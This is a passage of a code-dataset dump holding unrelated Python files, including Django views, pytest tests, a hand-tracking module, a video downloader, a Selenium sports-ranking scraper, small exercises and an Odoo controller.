Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('index.urls')),\n path('polls/', include('polls.urls')),\n path('blogs/', include('blog.urls')),\n path('files/', include('files.urls')),\n path('photos/', include('photos.urls')),\n path('users/', include('users.urls')),\n path('watchList/', include('watchlist.urls')),\n path('messageBoard/', include('messageboard.urls')),\n path('music/', include('music.urls')),\n path('mdeditor', include('mdeditor.urls')),\n path('captcha', include('captcha.urls'))\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"350349089","text":"# External imports\nimport unittest\nimport pytest\n\nimport numpy as np\nfrom gpmap import GenotypePhenotypeMap\n\n# Module to test\nfrom ..lasso import EpistasisLasso\n\n\n@pytest.fixture\ndef gpm():\n \"\"\"Create a genotype-phenotype map\"\"\"\n wildtype = \"000\"\n genotypes = [\"000\", \"001\", \"010\", \"100\", \"011\", \"101\", \"110\", \"111\"]\n phenotypes = [0.1, 0.1, 0.5, 0.4, 0.2, 0.8, 0.5, 1.0]\n stdeviations = 0.1\n return GenotypePhenotypeMap(wildtype, genotypes, phenotypes,\n stdeviations=stdeviations)\n\n\nclass TestEpistasisLasso(object):\n\n order = 3\n\n def test_init(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n\n # Checks\n check1 = model.order\n check2 = model.model_type\n assert check1 == self.order\n assert check2 == \"local\"\n\n def test_fit(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n # Checks\n check1 = hasattr(model, \"Xbuilt\")\n check2 = hasattr(model, \"coef_\")\n check3 = hasattr(model, \"epistasis\")\n\n # Tests\n assert check1 is True\n assert check2 is True\n assert check3 is True\n assert \"fit\" in model.Xbuilt\n\n\n def test_predict(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n check1 = model.predict(X='fit')\n\n # Tests\n assert \"predict\" in model.Xbuilt\n\n def test_score(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\", alpha=0.1)\n model.add_gpm(gpm)\n model.fit()\n score = model.score()\n # Tests\n assert score >= 0\n assert score <= 1\n\n def test_hypothesis(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n # Checks\n check1 = model.hypothesis(thetas=model.coef_)\n # Tests\n True\n\n def test_lnlikelihood(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n\n # Calculate lnlikelihood\n lnlike = model.lnlikelihood()\n assert lnlike.dtype == float\n","sub_path":"epistasis/models/linear/tests/test_lasso.py","file_name":"test_lasso.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"12048574","text":"from util import Queue\n\ndef earliest_ancestor(ancestors, starting_node):\n ancestors = [(1, 3), (2, 3), (3, 6), (5, 6), (5, 7), (4, 5), (4, 8), (8, 9), (11, 8), 
(10, 1)] if not ancestors else ancestors  # use the caller's data; the sample list above is only a fallback\n\n    # Create a graph\n    graph = {}\n    # Keep track of visited nodes\n    visited = set()\n    # Keeps track of the current path while traversing the graph\n    path = []\n    # add an empty edge set to the graph for every node that appears\n    for i in ancestors:\n        if i[0] not in graph:\n            graph[i[0]] = set()\n        if i[1] not in graph:\n            graph[i[1]] = set()\n    # add the child -> parent edges to the nodes\n    for ancestor in ancestors:\n        if ancestor[0] in graph and ancestor[1] in graph:\n            graph[ancestor[1]].add(ancestor[0])\n\n    # Create an empty queue\n    queue = Queue()\n    # Add the initial vertex to the path\n    path.append(starting_node)\n    # Then add the path to the queue\n    queue.enqueue(path)\n\n    # If the starting node has no ancestors at all, return -1\n    for i in graph:\n        if starting_node == i and not graph[i]:\n            return -1\n\n    # while we have something in our queue..\n    while queue.size() > 0:\n        # Dequeue the first path\n        path = queue.dequeue()\n        # We grab the last vertex from the path\n        last_vertex = path[-1]\n        # We check if it has NOT been visited..\n        if last_vertex not in visited:\n            # if not, we add it to the visited set\n            visited.add(last_vertex)\n            # iterate over the last vertex's neighbors..\n            for neighbor in graph[last_vertex]:\n                # we check if the neighbor is NOT marked as visited...\n                if neighbor not in visited:\n                    # if it is not, we make a copy of the path\n                    path_copy = path.copy()\n                    # we append the neighbor to the copy of the path\n                    path_copy.append(neighbor)\n                    # then we add the copy of the path to the queue\n                    queue.enqueue(path_copy)\n    # we return the last vertex, indicating the farthest node in the ancestry chain\n    return last_vertex\n\nif __name__=='__main__':\n    earliest_ancestor([], 4)  # empty list -> fall back to the sample data above\n\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"252338195","text":"import multiprocessing\n\n# Application to serve\nwsgi_app = 'app:app'\n# Worker class\nworker_class = \"uvicorn.workers.UvicornWorker\"\n# IP and port to bind\nbind = \"0.0.0.0:5000\"\n# Number of worker processes\nworkers = 2\n#workers = multiprocessing.cpu_count() * 1 + 1\n# Do not daemonize\ndaemon = False\n# Hot reload\nreload=True\n# Timeout\ntimeout = 10\n","sub_path":"Development_Setup/FastAPI/src/gunicorn.conf.py","file_name":"gunicorn.conf.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95679929","text":"import cv2\r\nimport mediapipe as mp\r\nimport time\r\nimport math\r\n\r\n\r\nclass handDetector():\r\n    def __init__(self, static_mode=False, max_hands=2, min_detection_confidence=0.5, min_tracking_confidence=0.5):\r\n        self.static_mode = static_mode\r\n        self.max_hands = max_hands\r\n        self.min_detection_confidence = min_detection_confidence\r\n        self.min_tracking_confidence = min_tracking_confidence\r\n\r\n        self.mpHands = mp.solutions.hands\r\n        self.hands = self.mpHands.Hands(self.static_mode, self.max_hands,\r\n                                        self.min_detection_confidence, self.min_tracking_confidence)\r\n        self.mpDraw = mp.solutions.drawing_utils\r\n\r\n    def findHands(self, img, draw=True):\r\n        # hands object uses RGB images only\r\n        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n        self.results = self.hands.process(imgRGB)\r\n        # print(results.multi_hand_landmarks)\r\n\r\n        if self.results.multi_hand_landmarks:\r\n            for handLms in self.results.multi_hand_landmarks: # for 
each hand\r\n if draw:\r\n self.mpDraw.draw_landmarks(\r\n img, handLms, self.mpHands.HAND_CONNECTIONS)\r\n\r\n return img\r\n\r\n def findPosition(self, img, handNo=0, draw=True):\r\n\r\n self.lmList = []\r\n if self.results.multi_hand_landmarks:\r\n myHand = self.results.multi_hand_landmarks[handNo]\r\n for id, lm in enumerate(myHand.landmark):\r\n # print(id, lm)\r\n h, w, c = img.shape\r\n # (x, y) are ratio of the point on img\r\n cx, cy = int(lm.x*w), int(lm.y*h)\r\n #print(id, cx, cy)\r\n self.lmList.append([id, cx, cy])\r\n if draw:\r\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\r\n\r\n return self.lmList\r\n\r\n def fingersUp(self):\r\n tipIds = [4, 8, 12, 16, 20]\r\n OpenFingers = []\r\n # FOR THUMB:\r\n if self.lmList[tipIds[0]][1] > self.lmList[tipIds[0]-1][1]: # lmlist[id][x][y]\r\n OpenFingers.append(1)\r\n else:\r\n OpenFingers.append(0)\r\n\r\n # Remaining Fingers:\r\n for id in range(1, 5):\r\n if self.lmList[tipIds[id]][2] < self.lmList[tipIds[id]-2][2]: # lmlist[id][x][y]\r\n OpenFingers.append(1)\r\n else:\r\n OpenFingers.append(0)\r\n # print(OpenFingers)\r\n return OpenFingers\r\n\r\n def findDistance(self, img, p1, p2):\r\n x1, y1 = self.lmList[p1][1], self.lmList[p1][2]\r\n x2, y2 = self.lmList[p2][1], self.lmList[p2][2]\r\n cx, cy = (x1 + x2) // 2, (y1 + y2) // 2\r\n\r\n cv2.circle(img, (x1, y1), 10, (255, 0, 255), cv2.FILLED)\r\n cv2.circle(img, (x2, y2), 10, (255, 0, 255), cv2.FILLED)\r\n cv2.circle(img, (cx, cy), 10, (255, 0, 255), cv2.FILLED)\r\n cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\r\n\r\n length = math.hypot(x2-x1, y2-y1)\r\n # print(length)\r\n\r\n # if length < 40:\r\n # cv2.circle(img, (cx, cy), 10, (255, 0, 0), cv2.FILLED)\r\n\r\n return length, [x1, y1, x2, y2, cx, cy]\r\n\r\n\r\ndef main():\r\n pTime = 0\r\n cTime = 0\r\n\r\n cap = cv2.VideoCapture(0)\r\n detector = handDetector() # using default parameters\r\n while True:\r\n success, img = cap.read()\r\n img = detector.findHands(img)\r\n lmList = detector.findPosition(img)\r\n if len(lmList) != 0:\r\n print(lmList[4]) # print position of 4th landmark\r\n\r\n cTime = time.time()\r\n fps = 1/(cTime - pTime)\r\n pTime = cTime\r\n\r\n cv2.putText(img, str(int(fps)), (10, 70),\r\n cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 2)\r\n\r\n cv2.imshow(\"Image\", img)\r\n cv2.waitKey(1)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"HandTrackingModule.py","file_name":"HandTrackingModule.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644008063","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\n\nfrom talk import models as m\nfrom talk import forms as f\n\n\n@login_required\ndef message(request, user_id):\n user = User.objects.get(id=user_id)\n try:\n conv = m.Conversation.objects.get(\n Q(user_1=request.user) & Q(user_2=user))\n except m.Conversation.DoesNotExist:\n try:\n conv = m.Conversation.objects.get(\n Q(user_1=user) & Q(user_2=request.user))\n except m.Conversation.DoesNotExist:\n conv = None\n messages = None\n if conv:\n messages = m.Message.objects.filter(conversation=conv)\n form = f.MessageForm(request.POST or None)\n if form.is_valid():\n if conv is None:\n conv = m.Conversation(user_1=request.user, user_2=user)\n conv.save()\n message = form.cleaned_data.get('content')\n msg = m.Message(conversation=conv, 
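# --- editor's note: illustrative sketch, not part of the original dataset record ---
# fingersUp above tests the thumb along x and the other fingertips along y
# against a lower joint; a compact equivalent over the [id, x, y] entries of
# lmList (same assumption as the original: a right hand facing the camera,
# with lmList already populated by findPosition):
def fingers_up(lm):
    tips = [4, 8, 12, 16, 20]
    thumb = int(lm[tips[0]][1] > lm[tips[0] - 1][1])           # x-axis test
    others = [int(lm[t][2] < lm[t - 2][2]) for t in tips[1:]]  # y-axis tests
    return [thumb] + others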
user=request.user, content=message)\n msg.save()\n return redirect('messages:message', user_id)\n args = dict(user=user, form=form, messages=messages)\n return render(request, 'talk/message_details.html', args)\n\n\n@login_required\ndef messages(request):\n args = dict()\n try:\n conv = m.Conversation.objects.filter(\n Q(user_1=request.user) | Q(user_2=request.user))\n except m.Conversation.DoesNotExist:\n conv = None\n args = dict(conv=conv)\n return render(request, 'talk/message_list.html', args)\n","sub_path":"talk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"409167004","text":"'''\n@author: Mike McMillan\n12.1 Recursive Function part 1\n'''\ndef factorial(n):\n if n == 1:\n return n\n else:\n return n*factorial(n-1)\n\ndef main():\n numList = [1, 2, 3, 4, 5]\n for num in numList:\n print(num, factorial(num))\n\nif __name__ == '__main__': main()\n","sub_path":"Python3/MikeMcMillan/recursion_factorial.py","file_name":"recursion_factorial.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"338051844","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/watchme/client/remove.py\n# Compiled at: 2020-04-10 14:08:50\n# Size of source mod 2**32: 935 bytes\n\"\"\"\n\nCopyright (C) 2019-2020 Vanessa Sochat.\n\nThis Source Code Form is subject to the terms of the\nMozilla Public License, v. 2.0. If a copy of the MPL was not distributed\nwith this file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\"\"\"\nfrom watchme import get_watcher\nfrom watchme.logger import bot\n\ndef main(args, extra):\n \"\"\"activate one or more watchers\n \"\"\"\n name = args.watcher[0]\n watcher = get_watcher(name, base=(args.base), create=False)\n if args.delete:\n watcher.delete()\n else:\n if extra is None:\n bot.exit('Provide tasks to remove, or --delete for entire watcher.')\n for task in extra:\n watcher.remove_task(task)","sub_path":"pycfiles/watchme-0.0.28-py3.7/remove.cpython-37.py","file_name":"remove.cpython-37.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"447737645","text":"import requests\nimport re\nfrom pyquery import PyQuery as py\nimport os\n\n# params\ncourse_url = \"http://ocw.nctu.edu.tw/course_detail-v.php?bgid=1&gid=1&nid=263\"\ntest_vedio_url = \"http://ocwvideo.nctu.edu.tw/pub/mp4/mxa001_mp4/mxa001_110914.mp4\"\npath = 'videos/'\n# set headers\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\"\n}\n\n# get the page_source\nresponse = requests.get(course_url, headers=headers)\n\n# get hrefs\nvedio_urls = []\ndoc = py(response.text)\nitems = doc(\".table.table-bordered.table-striped\")\nfor item in items('a').items():\n if item.attr('href') and item.text() == \"MP4 下載\":\n vedio_urls.append(item.attr('href'))\n print(item.attr('href'))\n\n\n# refer to https://www.cnblogs/^http:\\/\\/www\\..+\\.mp4$/.com/linxiyue/p/8244724.html\ndef download_video(url, fname):\n with requests.get(url, headers=headers, stream=True) as r:\n content_size = int(r.headers['content-length'])\n with open(fname, 'wb')as f:\n n = 1\n for i in 
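# --- editor's note: illustrative sketch, not part of the original dataset record ---
# The nested try/except conversation lookup in the message view above can be
# collapsed into a single query that matches either direction of the user pair:
conv = m.Conversation.objects.filter(
    Q(user_1=request.user, user_2=user) | Q(user_1=user, user_2=request.user)
).first()  # None when the two users have no conversation yet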
r.iter_content(chunk_size=1024):\n loaded = n * 1024.0 / content_size\n f.write(i)\n print(\"\\r processed {0:%}\".format(loaded), end=\"\")\n n += 1\n print('end this %s' % url)\n\n\n# start download\nif not os.path.exists(path):\n os.makedirs(path)\nfor v_url in vedio_urls:\n print(\"start download from %s\" % v_url)\n fname = v_url.split('/')[-1]\n download_video(v_url, path + fname)\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"56415966","text":"#########################################\n#########################################\n# 1. Activate pipenv shell\n# -- pipenv shell\n# 2. Run Python Script\n# -- python *filename*\n# 3. End python script\n# -- ctr c\n# 4. Exit pipenv shell\n# -- exit\n#########################################\n\n\n#imports\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException as ex\n# import time\nfrom bs4 import BeautifulSoup\n# import pandas as pd\n# import re\n# import os\n#website urls\nbase_url = 'http://www.worldsnowboarding.org/'\nathletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=SS&gender=M#table' #mens ss page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/27/?type=SS&gender=M' #mens ss page 27\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/9/?type=SS&gender=M' #mens ss page 9\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=HP&gender=M#table' #mens hp page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=BA&gender=M#table' #mens ba page 1\n\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=SS&gender=W#table' #womens ss page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=HP&gender=W#table' #womens hp page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=BA&gender=W#table' #womens ba page 1\n\n# Chrome session\ndriver = webdriver.Chrome(executable_path='/Users/rcadby/Sites/shreds_scraper/chromedriver')\ndriver.get(athletes_url)\ndriver.implicitly_wait(100)\n\n# name the output file to write to local disk\nout_filename = \"./csv/snowboard-profiles.csv\"\n# header of csv file to be written\nheaders = \"lastName, firstName, position, points, sponsors, age, nationality, nationality_full, stance, height, residence, resort, website, facebook, twitter, rider_concat_id, \\n\"\n\n# opens file, and writes headers\nf = open(out_filename, \"w\")\nf.write(headers)\n\n# initiate variables\ncountry_array = []\nscore_array = []\nposition_array = []\nlastname_array = []\nfirstname_array = []\nnationality_abr = []\n\ndef assign_arrays(type):\n # get full country name from table and add to array\n try:\n country_array.append(type.find(\"span\", {\"class\": \"icon-flag-medium\"})['oldtitle'].split(',')[0].lower())\n except:\n country_array.append('')\n # get rider score from table and add to array\n try:\n score_array.append(float(type.find(\"td\", {\"class\": \"last\"}).text))\n except:\n score_array.append('')\n # get position from table and add to array\n try:\n position_str = type.findChildren()[0].span.text\n position = int(position_str[:-1])\n position_array.append(position)\n except:\n 
position_array.append(0)\n # get rider last name\n try:\n lastname_array.append(type.find(\"a\", {\"class\": \"ranking-table-link\"}).text.split(',')[0])\n except:\n lastname_array.append('')\n # get rider first name\n try:\n firstname_array.append(type.find(\"a\", {\"class\": \"ranking-table-link\"}).text.split(',')[1])\n except:\n firstname_array.append('')\n # get full nationality\n try:\n nationality_full_array = type.find(\"span\", {\"class\": \"icon-flag-medium\"}).text.lower()\n nationality_abr.append(nationality_full_array)\n except:\n nationality_abr.append('')\n\n\n\n\n# get initial page soup\npage_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n\n# count number of pages\npage_count = page_soup.find('div', attrs={'class': 'pagination-links'}).find_all('a')\npages = []\nfor link in page_count:\n pages.append(link)\npage_total = pages[-2].text.strip()\npage_total = int(page_total) + 20\nprint(\"page total: \" + str(page_total))\n# initiate empty variable to see if it has already read this page\nlast_position_check = None\n\nfor i in range(page_total): # for each page\n\n # count profiles per page\n profile_count = len(driver.find_elements_by_class_name('ranking'))\n print('number of riders ' + str(profile_count))\n\n \n # wait for table to appear\n WebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".block-table\"))\n )\n rank_page_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # profile a tags\n profile_links = rank_page_soup.find_all(class_=\"ranking-table-link\")\n # get urls from a tags\n rider_link_array = []\n for profile_link in profile_links:\n rider_link_input = 'http://www.worldsnowboarding.org/' + profile_link.get('href')\n # rider_link_input = profile_link.get('href')\n rider_link_array.append(rider_link_input)\n\n\n # get whole rank row\n profile_data = rank_page_soup.find_all(\"tr\", {\"class\":\"ranking\"})\n country_array.clear()\n score_array.clear()\n position_array.clear()\n lastname_array.clear()\n firstname_array.clear()\n nationality_abr.clear()\n # get array of full country names\n for row in profile_data:\n assign_arrays(row)\n\n\n if i != 0 and position_array[(profile_count - 1)] == last_position_check:\n # navigate to link\n print('FAIL: duplicate page trial')\n print('current url: ' + driver.current_url)\n page_next = driver.find_element_by_class_name('next')\n page_next.click()\n print('next page url: ' + driver.current_url)\n\n # count profiles per page\n profile_count = len(driver.find_elements_by_class_name('ranking'))\n print('number of riders ' + str(profile_count))\n\n \n # wait for table to appear\n element = WebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".block-table\"))\n )\n rank_page_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # profile a tags\n profile_links = rank_page_soup.find_all(class_=\"ranking-table-link\")\n # get urls from a tags\n rider_link_array = []\n for profile_link in profile_links:\n rider_link_input = 'http://www.worldsnowboarding.org/' + profile_link.get('href')\n # rider_link_input = profile_link.get('href')\n rider_link_array.append(rider_link_input)\n\n # get whole rank row\n profile_data = rank_page_soup.find_all(\"tr\", {\"class\":\"ranking\"})\n country_array.clear()\n score_array.clear()\n position_array.clear()\n lastname_array.clear()\n firstname_array.clear()\n nationality_abr.clear()\n # get array of full country names\n for row in 
profile_data:\n assign_arrays(row)\n else:\n pass\n\n\n \n print('profile links:')\n print(profile_links) # print all a tags to profiles\n print('rider links:')\n print(rider_link_array) # print all urls to profiles\n print('full countries:')\n print(country_array)\n print('scores:')\n print(score_array)\n print('positions:')\n print(position_array)\n print('last names:')\n print(lastname_array)\n print('first names:')\n print(firstname_array)\n \n loop_counter = 0\n for rider_link in rider_link_array:\n # initiate list for rider stats\n profile = ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']\n # assign full country name to profile\n profile[7] = country_array[loop_counter]\n profile[0] = lastname_array[loop_counter]\n profile[1] = firstname_array[loop_counter]\n profile[2] = position_array[loop_counter]\n profile[3] = score_array[loop_counter]\n\n first_name_concat = firstname_array[loop_counter].strip().lower()\n last_name_concat = lastname_array[loop_counter].strip().lower()\n nationality_concat = nationality_abr[loop_counter].strip()\n profile[15] = str(first_name_concat + last_name_concat + nationality_concat)\n\n # click on rider profile\n driver.get(rider_link)\n # get html on rider page and parse\n profile_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # get rider name\n try:\n # rider_name = profile_soup.select('h1.rider-label')[0].text.strip()\n # profile[0] = rider_name\n \n # get rider sponsors\n rider_sponsor_soup = profile_soup.find('div', attrs={'class': 'sponsor-list'})\n if rider_sponsor_soup is None:\n profile[4] = ''\n else:\n rider_sponsor_soup_conf = rider_sponsor_soup.ul.find_all('li')\n sponsors = ''\n for litag in rider_sponsor_soup_conf:\n sponsor_item = litag.text.strip()\n sponsors += sponsor_item + ' | '\n\n profile[4] = sponsors\n\n profile_code_soup = profile_soup.find_all('ul', attrs={'class': 'plain-list'})\n for ultag in profile_code_soup:\n profile_li = ultag.find_all('li')\n\n for litag in profile_li:\n # get data\n profile_info = litag.getText()\n # clean data\n profile_info = profile_info.replace(\"'\", 'ft.')\n profile_info = profile_info.replace('\"', 'in.')\n profile_info = profile_info.replace(',', '|')\n\n # split profile info by title and value using a colon\n profile_type= profile_info.split(\":\", 1)[0].lower()\n profile_stat = profile_info.split(\":\", 1)[1].strip().replace('\\n', ' ') #replace new line value with space\n\n print(profile_type, profile_stat)\n\n # check nationality\n if profile_type == 'age':\n profile[5]=profile_stat\n elif profile_type == 'nationality':\n profile[6]=profile_stat\n elif profile_type == 'stance':\n profile[8]=profile_stat\n elif profile_type == 'height':\n profile[9]=profile_stat\n elif profile_type == 'residence':\n profile[10]=profile_stat\n elif profile_type == 'home resort':\n profile[11]=profile_stat\n elif profile_type == 'website':\n profile[12]=profile_stat\n elif profile_type == 'facebook':\n profile[13]=profile_stat\n elif profile_type == 'twitter':\n profile[14]=profile_stat\n else:\n pass\n\n profile_str = ', '.join(str(x) for x in profile)\n print('PROFILE STRING: ' + profile_str)\n f.write(profile_str)\n if loop_counter == 49:\n last_position_check = profile[2]\n\n\n # go back to initial page\n driver.execute_script(\"window.history.go(-1)\")\n\n #start new line for new rider profile\n f.write(\"\\n\")\n except:\n print('FAIL: 404 go back')\n # go back to initial page\n driver.execute_script(\"window.history.go(-1)\")\n\n table_soup = 
BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # find url in table\n url = rider_link.strip('http://www.worldsnowboarding.org/')\n find_link = table_soup.select_one(\"a[href*='\" + url + \"']\")\n # find parent of url - this is the row that has all the rider info\n parent = find_link.find_parent('tr', attrs={'class': 'ranking'})\n stat_array = parent.find_all('td')\n\n profile[1] = int(stat_array[0].span.text.strip('.')) #position\n name = stat_array[3].a.text.split(',')\n first_name = name[1]\n last_name = name[0]\n profile[0] = str(first_name + last_name) #name\n profile[5] = stat_array[4].span.text #nationality\n if stat_array[5] is not None or len(stat_array[5]) > 0:\n profile[4] = stat_array[5].text #age\n profile[2] = float(stat_array[8].text) #points\n\n profile_str = ', '.join(str(x) for x in profile)\n print('PROFILE STRING (FROM TABLE): ' + profile_str)\n f.write(profile_str)\n\n #start new line for new rider profile\n f.write(\"\\n\")\n\n loop_counter += 1\n\n # # wait for table to appear\n # WebDriverWait(driver, 10).until(\n # EC.visibility_of_element_located((By.CSS_SELECTOR, \".pagination\"))\n # )\n # navigate to link\n try:\n page_next = driver.find_element_by_class_name('next')\n page_next.click()\n except:\n driver.execute_script(\"window.history.go(-1)\")\n page_next = driver.find_element_by_class_name('next')\n page_next.click()\n\nf.close() # Close the file\ndriver.quit()","sub_path":"shredstats_scraper_all.py","file_name":"shredstats_scraper_all.py","file_ext":"py","file_size_in_byte":13132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"602991054","text":"n = int(input())\na = [int(x) for x in input().split()]\n\ny = []\nfor s, t in zip(a, a[1:]):\n if abs(s - t) != 1 and s != t:\n y.append(abs(s - t))\ny.append(1)\ny = y[0]\n\nfor s, t in zip(a, a[1:]):\n if not(abs(s - t) == y or (abs(s - t) == 1 and min(s, t) % y != 0)):\n break\nelse:\n print(\"YES\")\n print(\"{} {}\".format(10**9, y))\n exit()\n\nprint(\"NO\")\n","sub_path":"Codeforces/954C.py","file_name":"954C.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"520911128","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\n\nfor tc in range(1, T+1):\n str1 = list(map(int,input()))\n N = len(str1)\n str2 = [0]*N #0으로 채워진 리스트를 한개 만들어줌\n\n # print(str1)\n # print(str2)\n cnt = 0\n\n for i in range(N):\n if str2[i] == str1[i]:\n continue\n elif str2[i] != str1[i]: #같지 않다면 str1의 인덱스 i번째 값으로 끝까지 채운다\n cnt += 1\n j = i\n for j in range(N):\n str2[j] = str1[i]\n\n #print(str2)\n\n\n print(\"#{} {}\".format(tc,cnt))\n\n","sub_path":"SWEA/1289_원재의메모리복구/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510657148","text":"# create a tuple named zoo\nzoo = ('zebra', 'elephant', 'flamingo', 'camel', 'polarbear')\n\n# find animal using index\nprint(zoo.index('flamingo'))\n\n# determine if animal is in tuple\nanimal = []\n\ndef find(animal):\n for value in zoo:\n if animal in zoo:\n print(f'{animal} is currently at the Zoo.')\n else:\n print(f'{animal} is not at the Zoo.')\n\nfind('flamingo')\nfind('lion')\n\n# create variable for each animal\n(zebra, elephant, flamingo, camel, polarbear) = zoo\nprint(elephant)\n\n# convert tuple to list\nzoo_list = list(zoo)\nprint(zoo_list)\n\n# use extend to add 3 
animals\nzoo_list.extend(['kitty', 'cardinal', 'dolphin'])\nprint(zoo_list)\n\n# convert list back to tuple\nprint(tuple(zoo_list))","sub_path":"tuples/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"289767598","text":"from odoo import http, tools\nfrom odoo.http import request\nfrom bs4 import BeautifulSoup\nimport werkzeug\nimport requests\nimport logging\nimport json\n\n_logger = logging.getLogger(__name__)\n\n\nclass WechatEnglishController(http.Controller):\n\n @http.route('/api/v2/wechat_english', type='json', auth=\"user\")\n def wechat_category(self, key, **kw):\n result_list = []\n user_id = request.env.user.id\n word_lexicon = request.env['english.lexicon']\n user_word = request.env['english.lexicon.user.master']\n word_list = word_lexicon.sudo().search([\n \"|\",\n (\"word\", \"ilike\", key),\n (\"chinese_mean\", \"ilike\", key)])\n for word in word_list:\n is_added = False\n user_master = user_word.sudo().search([('english_lexicon_id', '=', word.id), ('user_id', '=', user_id)], limit=1)\n if user_master:\n is_added = True\n word_voice_url = word_lexicon.sudo().get_word_voice_url(word.id)\n result = {\"id\": word.id,\n \"word\": word.word,\n \"chinese_mean\": word.chinese_mean,\n \"british_accent\": word.british_accent,\n \"source_name\": word.source_name,\n \"sequence\": word.sequence,\n \"forms\": word.forms,\n \"is_added\": is_added,\n \"voice_url\": word_voice_url,\n }\n defintion_list = []\n special_defintion_word = {\n \"order\": 0,\n \"gram\": \"\",\n \"english_mean\": word.chinese_mean,\n \"chinese_mean\": \"\",\n \"synonymous\": word.forms,\n \"sentence_list\": []\n }\n defintion_list.append(special_defintion_word)\n\n for defintion in word.lexicon_explain_ids:\n defintion_word = {\n \"order\": defintion.order,\n \"gram\": defintion.gram,\n \"english_mean\": defintion.english_mean,\n \"chinese_mean\": defintion.chinese_mean,\n \"synonymous\": defintion.synonymous,\n }\n sentence_list = []\n for example in defintion.lexicon_explain_example_ids:\n sentences = {\n \"order\": example.order,\n \"example\": example.sentence,\n }\n sentence_list.append(sentences)\n defintion_word[\"sentence_list\"] = 